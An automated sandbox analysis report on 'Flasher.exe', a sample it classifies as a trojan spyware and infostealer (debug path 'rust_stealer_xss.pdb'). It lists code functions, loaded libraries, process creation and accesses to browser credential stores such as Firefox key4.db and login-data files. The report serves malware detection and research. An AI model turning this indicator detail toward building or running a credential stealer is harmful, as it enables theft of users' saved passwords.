Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3544210	0_2_00007FF6D3544210
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D360B1D8	0_2_00007FF6D360B1D8
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35451EE	0_2_00007FF6D35451EE
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D353F1D0	0_2_00007FF6D353F1D0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35401D0	0_2_00007FF6D35401D0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35478B3	0_2_00007FF6D35478B3
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D354888A	0_2_00007FF6D354888A
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35C292B	0_2_00007FF6D35C292B
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35A58EF	0_2_00007FF6D35A58EF
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35268E7	0_2_00007FF6D35268E7
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35348CF	0_2_00007FF6D35348CF
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35337A9	0_2_00007FF6D35337A9
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352E778	0_2_00007FF6D352E778
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35F9794	0_2_00007FF6D35F9794
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3532790	0_2_00007FF6D3532790
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352478E	0_2_00007FF6D352478E
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3550770	0_2_00007FF6D3550770
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D34F2801	0_2_00007FF6D34F2801
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D366A80C	0_2_00007FF6D366A80C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35EA800	0_2_00007FF6D35EA800
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35007BA	0_2_00007FF6D35007BA
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35CC69B	0_2_00007FF6D35CC69B
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3685664	0_2_00007FF6D3685664
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3739678	0_2_00007FF6D3739678
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35266E8	0_2_00007FF6D35266E8
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36686D8	0_2_00007FF6D36686D8
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35D36ED	0_2_00007FF6D35D36ED
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35EB6C0	0_2_00007FF6D35EB6C0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3522598	0_2_00007FF6D3522598
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D354757D	0_2_00007FF6D354757D
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35D8580	0_2_00007FF6D35D8580
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35EA540	0_2_00007FF6D35EA540
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D358B54D	0_2_00007FF6D358B54D
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35025D9	0_2_00007FF6D35025D9
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3601C90	0_2_00007FF6D3601C90
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36C0C48	0_2_00007FF6D36C0C48
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3738D30	0_2_00007FF6D3738D30
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3506D24	0_2_00007FF6D3506D24
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352ED15	0_2_00007FF6D352ED15
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35F3B9D	0_2_00007FF6D35F3B9D
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3562B7C	0_2_00007FF6D3562B7C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3512B62	0_2_00007FF6D3512B62
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3552B6C	0_2_00007FF6D3552B6C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3513B68	0_2_00007FF6D3513B68
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D353DA80	0_2_00007FF6D353DA80
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3725AF0	0_2_00007FF6D3725AF0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3540A60	0_2_00007FF6D3540A60
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D356DA3B	0_2_00007FF6D356DA3B
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D34FCB06	0_2_00007FF6D34FCB06
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35D9AE0	0_2_00007FF6D35D9AE0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D356BABA	0_2_00007FF6D356BABA
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3736AA9	0_2_00007FF6D3736AA9
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36D9AC4	0_2_00007FF6D36D9AC4
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352EAC7	0_2_00007FF6D352EAC7
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3682980	0_2_00007FF6D3682980
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D34F494F	0_2_00007FF6D34F494F
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D358C956	0_2_00007FF6D358C956
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3541960	0_2_00007FF6D3541960
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3550939	0_2_00007FF6D3550939
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D354794C	0_2_00007FF6D354794C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35369C0	0_2_00007FF6D35369C0
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36059BC	0_2_00007FF6D36059BC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36049D1	0_2_00007FF6D36049D1
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D356D0B4	0_2_00007FF6D356D0B4
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3572069	0_2_00007FF6D3572069
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3513053	0_2_00007FF6D3513053
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3536134	0_2_00007FF6D3536134
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D352F0E4	0_2_00007FF6D352F0E4
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35F5FB5	0_2_00007FF6D35F5FB5
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D356AF8C	0_2_00007FF6D356AF8C
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3530023	0_2_00007FF6D3530023
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3551015	0_2_00007FF6D3551015
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D356BFCC	0_2_00007FF6D356BFCC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35C2FC9	0_2_00007FF6D35C2FC9
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D36FBEAC	0_2_00007FF6D36FBEAC
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3529EA7	0_2_00007FF6D3529EA7
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3531E90	0_2_00007FF6D3531E90
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3734F00	0_2_00007FF6D3734F00
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3525E4B	0_2_00007FF6D3525E4B
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3688F20	0_2_00007FF6D3688F20
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3579EFE	0_2_00007FF6D3579EFE
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3600DB5	0_2_00007FF6D3600DB5
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3602DA8	0_2_00007FF6D3602DA8
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D35FFD86	0_2_00007FF6D35FFD86
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3513D64	0_2_00007FF6D3513D64
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3579E22	0_2_00007FF6D3579E22
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3541E30	0_2_00007FF6D3541E30
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D34FFE16	0_2_00007FF6D34FFE16
Source: C:\Users\user\Desktop\Flasher.exe	Code function: 0_2_00007FF6D3542DE0	0_2_00007FF6D3542DE0

Source: C:\Users\user\Desktop\Flasher.exe	Code function: String function: 00007FF6D3734750 appears 88 times
Source: C:\Users\user\Desktop\Flasher.exe	Code function: String function: 00007FF6D3734A10 appears 49 times
Source: C:\Users\user\Desktop\Flasher.exe	Code function: String function: 00007FF6D3734B30 appears 33 times

Source: Flasher.exe	Binary string: Failed to open \Device\Afd\Mio:
Source: Flasher.exe	Binary string: 4Afdfd\Device\Afd\Mio

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@4/51@2/2

Source: C:\Users\user\Desktop\Flasher.exe

Code function: 0_2_00007FF6D360D459 CoCreateInstance,SysFreeString,CoSetProxyBlanket,SysFreeString,

0_2_00007FF6D360D459

Source: C:\Users\user\Desktop\Flasher.exe

File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03

Source: C:\Users\user\Desktop\Flasher.exe

File created: C:\Users\user\AppData\Local\Temp\5bNHSIe7QwCmVq5h9ISRvSOeTigAH4\

Jump to behavior

Source: Flasher.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Flasher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\Flasher.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Flasher.exe, 00000000.00000003.1708321442.000001EE77952000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709253050.000001EE77949000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709891281.000001EE79129000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712223125.000001EE79127000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1708262684.000001EE77950000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1710469922.000001EE79122000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1709870787.000001EE79125000.00000004.00000020.00020000.00000000.sdmp, Flasher.exe, 00000000.00000003.1712496047.000001EE79126000.00000004.00000020.00020000.00000000.sdmp, browser_default_login_data.0.dr, coowoo_default_login_data.0.dr, comodo_default_login_data.0.dr, bravesoftware_default_login_data.0.dr, opera stable_default_login_data.0.dr, google_default_login_data.0.dr, kometa_default_login_data.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Flasher.exe, 00000000.00000000.1650128327.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp, Flasher.exe, 00000000.00000002.1761879684.00007FF6D373A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: unknown	Process created: C:\Users\user\Desktop\Flasher.exe "C:\Users\user\Desktop\Flasher.exe"
Source: C:\Users\user\Desktop\Flasher.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture \| Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Flasher.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture \| Select -ExpandProperty DisplayName"	Jump to behavior

Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Flasher.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Flasher.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Flasher.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Flasher.exe

Static file information: File size 3266048 > 1048576

Source: Flasher.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x248e00

Source: Flasher.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: Flasher.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: rust_stealer_xss.pdb source: Flasher.exe

Source: C:\Users\user\Desktop\Flasher.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
